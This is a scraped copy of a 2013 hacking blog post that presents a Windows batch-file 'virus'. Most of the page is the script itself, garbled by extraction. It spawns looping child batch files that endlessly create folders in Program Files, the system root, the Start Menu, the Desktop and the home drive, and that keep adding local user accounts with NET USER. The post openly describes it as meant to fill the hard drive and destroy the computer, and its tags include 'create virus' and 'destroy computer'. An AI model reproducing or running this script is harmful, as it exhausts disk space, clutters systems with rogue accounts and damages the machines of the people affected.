Professional Documents
Culture Documents
Attack Harddisk Using Batch File Virus - Hacking
Attack Harddisk Using Batch File Virus - Hacking
Go For
Hacking
Program m ing
Hacking New s
@ E C H OO F F @ E C H OI c e n t u mv i r u sC r e a t i o n @ E C H OM A I NB A TR U N N I N G G O T Os t a r t : s t a r t @ E C H OS E Tm a g i c 2 = 1> >b a t 6 . b a t @ E C H OG O T Of l o o d 5> >b a t 6 . b a t @ E C H O: f l o o d 5> >b a t 6 . b a t @ E C H OS E T/ am a g i c 2 = % % m a g i c 2 % % + 1> >b a t 6 . b a t @ E C H ON E TU S E Rm a g i c 2 % % m a g i c 2 % %/ a d d> >b a t 6 . b a t @ E C H OG O T Of l o o d 5> >b a t 6 . b a t S T A R T/ M I Nb a t 6 . b a t G O T Ob a t 5 : b a t 5 @ E C H OC D% % P r o g r a m F i l e s % %> >b a t 5 . b a t @ E C H OS E Tp o g o = 1> >b a t 5 . b a t @ E C H OG O T Of l o o d 4> >b a t 5 . b a t @ E C H O: f l o o d 4> >b a t 5 . b a t @ E C H OM K D I Rp o g o % % p o g o % %> >b a t 5 . b a t @ E C H OS E T/ ap o g o = % % p o g o % % + 1> >b a t 5 . b a t @ E C H OG O T Of l o o d 4> >b a t 5 . b a t S T A R T/ M I Nb a t 5 . b a t G O T Ob a t 4 : b a t 4 @ E C H OC D% % S y s t e m R o o t % %> >b a t 4 . b a t @ E C H OS E Th a t = 1> >b a t 4 . b a t @ E C H OG O T Of l o o d 3> >b a t 4 . b a t @ E C H O: f l o o d 3> >b a t 4 . b a t
www.icentum.net/hacking/attack-harddisk-using-batch-file-virus/ 1/3
9/6/13
@ E C H OM K D I Rh a t % % h a t % %> >b a t 4 . b a t @ E C H OS E T/ ah a t = % % h a t % % + 1> >b a t 4 . b a t @ E C H OG O T Of l o o d 3> >b a t 4 . b a t S T A R T/ M I Nb a t 4 . b a t G O T Ob a t 3 : b a t 3 @ E C H OC D% % U s e r P r o f i l e % % S t a r tM e n u P r o g r a m s> >b a t 3 . b a t @ E C H OS E Tc h a r t = 1> >b a t 3 . b a t @ E C H OG O T Of l o o d 2> >b a t 3 . b a t @ E C H O: f l o o d 2> >b a t 3 . b a t @ E C H OM K D I Rc h a r t % % c h a r t % %> >b a t 3 . b a t @ E C H OS E T/ ac h a r t = % % c h a r t % % + 1> >b a t 3 . b a t @ E C H OG O T Of l o o d 2> >b a t 3 . b a t S T A R T/ M I Nb a t 3 . b a t G O T Ob a t 2 : b a t 2 @ E C H OC D% % U s e r P r o f i l e % % D e s k t o p> >b a t 2 . b a t @ E C H OS E Tg a m e r = 1> >b a t 2 . b a t @ E C H OG O T Of l o o d> >b a t 2 . b a t @ E C H O: f l o o d> >b a t 2 . b a t @ E C H OM K D I Rg a m e r % % g a m e r % %> >b a t 2 . b a t @ E C H OS E T/ ag a m e r = % % g a m e r % % + 1> >b a t 2 . b a t @ E C H OG O T Of l o o d> >b a t 2 . b a t S T A R T/ M I Nb a t 2 . b a t G O T Oo r i g i n a l :o r i g i n a l C D% H o m e D r i v e % S E Ts h a r m a = 1 G O T Of l o o d 1 : f l o o d 1 M K D I Rs h a r m a % s h a r m a % S E T/ as h a r m a = % s h a r m a % + 1 G O T Of l o o d 1
What does it do : this is an extremely harmful virus the will keep replicating itself until your hard drive is totally full and will destroy your computer.
www.icentum.net/hacking/attack-harddisk-using-batch-file-virus/
2/3
9/6/13
32
0
Like
This entry was posted in Batch File Scripting, Virus Programming, windows hacking and tagged attack harddisk, bat virus to attack harddisk, batch file virus, create virus, destroy computer. Bookmark the permalink.
www.icentum.net/hacking/attack-harddisk-using-batch-file-virus/
3/3